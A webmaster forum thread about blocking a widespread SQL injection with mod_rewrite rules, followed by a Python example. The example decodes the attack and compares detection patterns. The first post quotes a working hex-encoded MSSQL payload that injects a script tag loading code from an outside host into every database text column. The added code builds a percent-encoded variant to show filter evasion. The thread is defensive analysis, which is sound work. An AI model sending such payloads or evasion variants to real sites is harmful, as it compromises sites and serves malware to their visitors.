Latest SQL injection, trying to prevent hacks via mod rewrite

concepts99

5:10 pm on Aug 16, 2008 (gmt 0)

10+ Year Member



Hello,

There is a new wave of SQL injection via the method below

It uses the set CHAR

<snip>

I am getting hit 6-10 times every five minutes. I want to stop the server from processing this request altogether.

I see the sample has CHAR(4000) and EXEC(@S) as a common name.

I have tried

RewriteEngine on
RewriteCond %{QUERY_STRING} .*char\(4000\).* [NC]
RewriteRule . - [F]
RewriteCond %{QUERY_STRING} .*CHAR%284000%28.* [NC]
RewriteRule . - [F]

but it was written for IIS. It doesn't seem to work for my Apache. Can anyone offer some advice? I am sure others will also find this useful since this attack is so widespread.

Request URI: /x/product.php?productid=5782;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444543
4C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D65206672
6F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78
747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233
31206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20
205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547
494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A7322
3E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E
3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F73637269
70743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR
(4000));ExEC(@S);

[edited by: jdMorgan at 5:39 pm (utc) on Aug. 16, 2008]
[edit reason] No URLs, please. See Terms of Service. [/edit]

jdMorgan

5:52 pm on Aug 16, 2008 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



You cannot prevent the server from processing the request altogether, unless you have a deep-packet-inspection firewall protecting your server -- which would prevent the request from reaching your server. The code will simply tell the server to return a 403-Forbidden response.

The second rule's RewriteCond is malformed, in that "%" is a special character for mod_rewrite, and it was not escaped in the code. The patterns also have unnecessary ".*" subpatterns in them, which do nothing since the patterns are not anchored. I'd suggest:


RewriteEngine on
RewriteCond %{QUERY_STRING} DECLARE|CHAR|SET|CAST|EXEC [NC]
RewriteRule . - [F]

Important: Replace the broken pipe "¦" characters with solid pipes before use; Posting on this forum modifies the pipe characters.

This will catch any or all of those command words. Of course, you will need to use a more-specific pattern if your site actually needs to allow any of those commands to be passed in a query string -- certainly not a good idea.

If this code does not return a 403-Forbidden response (you can test it manually using any or all of those words in a query to any page) on your server, then you may need to preface the code above with:


Options +FollowSymLinks

If this doesn't help, then please post a more thorough description of how you tested, what URLs you tried, what were the results, and how those results differed from your expectations.

Jim
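An added example for the two posts above (it is not code from either poster). It decodes the CAST(0x... AS CHAR(4000)) body from the Request URI in the first post, so the reader can see what the request would have done to an MSSQL back end, and then runs the bare DECLARE|CHAR|SET|CAST|EXEC alternation from the reply, applied the way a RewriteCond applies it, over a few query strings beside a pattern keyed on the injection's structure. Two caveats the comparison makes visible: the alternation is unanchored, so it also fires on ordinary words such as "broadcast", "charger" and "offset"; and mod_rewrite tests %{QUERY_STRING} before percent-decoding, so an attacker who percent-encodes the keywords slips past a bare-word rule. Every sample query other than the one copied from the post, the percent-encoded variant included, is constructed for this example. A rule of this kind only shortens the log: the injection itself is stopped by passing productid to the database as a bound parameter instead of splicing it into the query text.

```python
"""Added example (not code from either post above).

1. Decode the CAST(0x... AS CHAR(4000)) body posted in the Request URI.
2. Run the bare keyword alternation from the reply, the way mod_rewrite
   applies it, over sample query strings, beside a structural pattern.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Hex body copied from the Request URI in the first post, line wraps removed.
PAYLOAD_HEX = (
    "4445434C415245204054207661726368617228323535292C4043207661726368617228343030302920444543"
    "4C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D65206672"
    "6F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78"
    "747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D3233"
    "31206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20"
    "205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547"
    "494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C"
    "2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A7322"
    "3E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E"
    "3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F73637269"
    "70743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320"
    "454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72"
)

# The query string of the posted Request URI, reassembled from the post.
POSTED_QUERY = (
    "productid=5782;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + PAYLOAD_HEX
    + "%20AS%20CHAR(4000));ExEC(@S);"
)

# Constructed samples for the comparison (not from the thread).
BENIGN_ID = "productid=5782"
BENIGN_SEARCH = "q=broadcast+charger&offset=10&reset=1"   # keywords only as substrings
# Hypothetical variant of the same attack with every keyword percent-encoded;
# its hex decodes to SELECT @@VERSION. mod_rewrite matches %{QUERY_STRING}
# before decoding, so a bare-word rule never sees "DECLARE" here.
ENCODED_ATTACK = (
    "productid=5782%3B%44%45%43%4C%41%52%45%20%40S%20%43%48%41%52%284000%29%3B"
    "%53%45%54%20%40S%3D%43%41%53%54%280x53454C45435420404056455253494F4E"
    "%20AS%20%43%48%41%52%284000%29%29%3B%45%58%45%43%28%40S%29"
)

SAMPLE_QUERIES: List[Tuple[str, str]] = [
    ("posted attack", POSTED_QUERY),
    ("benign id", BENIGN_ID),
    ("benign search", BENIGN_SEARCH),
    ("encoded attack", ENCODED_ATTACK),
]

CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR", re.IGNORECASE)


def decode_cast_payload(query_string: str) -> Optional[str]:
    """Return the SQL hidden in CAST(0x... AS [N][VAR]CHAR(...)), or None."""
    m = CAST_HEX.search(unquote(query_string))   # decode %28/%29 etc. first
    if not m:
        return None
    try:
        raw = bytes.fromhex(m.group(1))
    except ValueError:                            # odd length or stray characters
        return None
    # NCHAR/NVARCHAR payloads are UTF-16LE; CHAR/VARCHAR payloads are single-byte.
    return raw.decode("utf-16-le" if m.group(2) else "latin-1")


# The alternation from the reply, as a RewriteCond applies it: case-insensitive,
# unanchored, against the raw (still percent-encoded) QUERY_STRING.
NAIVE_RULE = re.compile(r"DECLARE|CHAR|SET|CAST|EXEC", re.IGNORECASE)

# A pattern keyed on the shape of this injection rather than on bare words,
# applied after percent-decoding.
STRUCTURAL_RULE = re.compile(
    r"(?:^|[;\s])declare\s+@\w+\s+n?(?:var)?char\s*\("     # DECLARE @S CHAR(
    r"|cast\s*\(\s*0x[0-9a-f]{8,}\s+as\s+n?(?:var)?char"   # CAST(0x... AS CHAR
    r"|exec\s*\(\s*@\w+\s*\)",                              # EXEC(@S)
    re.IGNORECASE,
)


def naive_match(query_string: str) -> bool:
    return NAIVE_RULE.search(query_string) is not None


def structural_match(query_string: str) -> bool:
    return STRUCTURAL_RULE.search(unquote(query_string)) is not None


def evaluate(queries=SAMPLE_QUERIES) -> List[Tuple[str, bool, bool]]:
    """(label, flagged by naive rule, flagged by structural rule) for each query."""
    return [(label, naive_match(q), structural_match(q)) for label, q in queries]


if __name__ == "__main__":
    print(decode_cast_payload(POSTED_QUERY))
    for label, naive, structural in evaluate():
        print(f"{label:15} naive={naive!s:5} structural={structural}")
```

Running it prints the decoded cursor loop (it walks sysobjects/syscolumns and appends a script tag to every text column of every user table) and a four-row table in which the posted attack is flagged by both rules, the plain product id by neither, the benign search only by the bare-word rule, and the percent-encoded variant only by the structural rule. The structural pattern is tuned to this one payload family and is offered as a comparison, not as a complete filter.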